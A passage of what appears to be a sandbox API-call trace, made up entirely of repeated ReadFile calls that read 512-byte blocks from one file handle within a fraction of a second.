lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.167] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.167] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.167] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.167] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.168] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.168] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.168] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.168] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.168] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.168] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.168] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.168] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.168] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.168] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.168] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.168] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.169] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.169] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.169] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.169] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.169] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.169] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.169] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.169] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.169] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.169] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.169] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.170] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.170] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.170] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.170] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.170] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.170] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.170] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.170] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.170] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.170] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.170] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.170] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.171] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.171] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.171] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.171] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.171] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.171] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.171] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.171] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.171] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.171] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.171] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.171] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.172] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.172] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.172] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.172] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.172] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.172] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.172] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.172] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.172] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.172] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.172] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.172] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.172] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.173] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.173] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.173] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.173] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.173] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.173] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.173] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.173] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.173] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.173] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.173] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.173] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.174] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.174] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.174] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.174] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.174] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.174] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.174] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.174] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.174] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.174] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.174] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.174] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.175] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.175] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.175] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.175] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.175] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.175] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.175] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.175] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.175] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.175] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.175] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.175] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, 